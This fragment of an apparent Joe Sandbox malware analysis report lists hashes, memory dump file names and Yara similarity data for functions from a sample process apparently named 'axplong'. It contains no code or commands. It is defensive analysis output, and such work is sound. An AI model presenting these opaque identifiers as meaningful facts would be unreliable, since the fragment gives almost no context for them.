                                                                    • Instruction ID: 366af7cefd98687957400b87ee55d9c47e3829abc21eee9016022b0ee7c5b167
                                                                    • Opcode Fuzzy Hash: 7941c91dc3c81985f55d5af0d0e5d35b4c2fcc41726f6f06d2574da038ee3747
                                                                    • Instruction Fuzzy Hash: FDB17DB29002A59FDB11CF28D8417FEBBF9EF95340F14856AE885EB349D6389D41CB60
                                                                    Function 0090BAA2 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.3387924782.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008F0000, based on PE: true
                                                                    • Associated: 00000006.00000002.3387897532.00000000008F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3387924782.0000000000952000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388039573.0000000000959000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000AF0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BCC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000BF9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388069389.0000000000C13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388467481.0000000000C14000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388812602.0000000000DB6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.3388852687.0000000000DB8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_8f0000_axplong.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xtime_diff_to_millis2_xtime_get
                                                                    • String ID:
                                                                    • API String ID: 531285432-0
                                                                    • Opcode ID: 906348bae2102637fc151600c74ae2edff3753bb92f0c3caf7db54993a881ed5
                                                                    • Instruction ID: 4a46cba881295599b4d0d7becae79430385da980b66b39dcd3227be1449db55a
                                                                    • Opcode Fuzzy Hash: 906348bae2102637fc151600c74ae2edff3753bb92f0c3caf7db54993a881ed5
                                                                    • Instruction Fuzzy Hash: 582151B5A052099FDF10EFA4DC45ABEBBB8EF49710F000165FA01B72D1DB70AD019BA1